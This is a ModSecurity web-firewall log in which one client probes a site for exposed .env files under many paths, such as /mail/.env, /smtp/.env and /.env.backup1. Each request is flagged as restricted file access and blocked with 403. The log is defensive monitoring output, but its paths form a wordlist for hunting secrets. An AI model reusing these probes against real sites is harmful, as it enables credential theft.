[Mon May 11 17:23:00.164770 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwgAAAAI"]
[Mon May 11 17:23:00.322399 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwwAAAAI"]
[Mon May 11 17:23:00.322865 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwwAAAAI"]
[Mon May 11 17:23:00.323092 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwwAAAAI"]
[Mon May 11 17:23:00.477904 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agH0VA-Qm4vhlWBPlMjNxAAAAAI"]
[Mon May 11 17:23:00.478411 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agH0VA-Qm4vhlWBPlMjNxAAAAAI"]
[Mon May 11 17:23:00.478644 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agH0VA-Qm4vhlWBPlMjNxAAAAAI"]
[Mon May 11 17:23:00.632783 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agH0VA-Qm4vhlWBPlMjNxgAAAAI"]
[Mon May 11 17:23:00.633278 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agH0VA-Qm4vhlWBPlMjNxgAAAAI"]
[Mon May 11 17:23:00.633521 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agH0VA-Qm4vhlWBPlMjNxgAAAAI"]
[Mon May 11 17:23:00.787565 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNyAAAAAI"]
[Mon May 11 17:23:00.788024 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNyAAAAAI"]
[Mon May 11 17:23:00.788249 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNyAAAAAI"]
[Mon May 11 17:23:00.942349 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNyQAAAAI"]
[Mon May 11 17:23:00.942831 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNyQAAAAI"]
[Mon May 11 17:23:00.943050 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNyQAAAAI"]
[Mon May 11 17:23:01.101967 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNygAAAAI"]
[Mon May 11 17:23:01.102481 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNygAAAAI"]
[Mon May 11 17:23:01.102729 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNygAAAAI"]
[Mon May 11 17:23:01.257239 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNywAAAAI"]
[Mon May 11 17:23:01.257745 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNywAAAAI"]
[Mon May 11 17:23:01.257986 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNywAAAAI"]
[Mon May 11 17:23:01.412274 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzAAAAAI"]
[Mon May 11 17:23:01.412773 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzAAAAAI"]
[Mon May 11 17:23:01.413006 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzAAAAAI"]
[Mon May 11 17:23:01.567059 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzQAAAAI"]
[Mon May 11 17:23:01.567609 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzQAAAAI"]
[Mon May 11 17:23:01.567867 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzQAAAAI"]
[Mon May 11 17:23:01.721860 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzwAAAAI"]
[Mon May 11 17:23:01.722361 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzwAAAAI"]
[Mon May 11 17:23:01.722598 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjNzwAAAAI"]
[Mon May 11 17:23:01.876806 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjN0AAAAAI"]
[Mon May 11 17:23:01.877301 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjN0AAAAAI"]
[Mon May 11 17:23:01.877547 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agH0VQ-Qm4vhlWBPlMjN0AAAAAI"]
[Mon May 11 17:23:02.032404 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0QAAAAI"]
[Mon May 11 17:23:02.032891 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0QAAAAI"]
[Mon May 11 17:23:02.033123 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0QAAAAI"]
[Mon May 11 17:23:02.188786 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0gAAAAI"]
[Mon May 11 17:23:02.189284 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agH0Vg-Qm4vhlWBPlMjN0gAAAAI"]
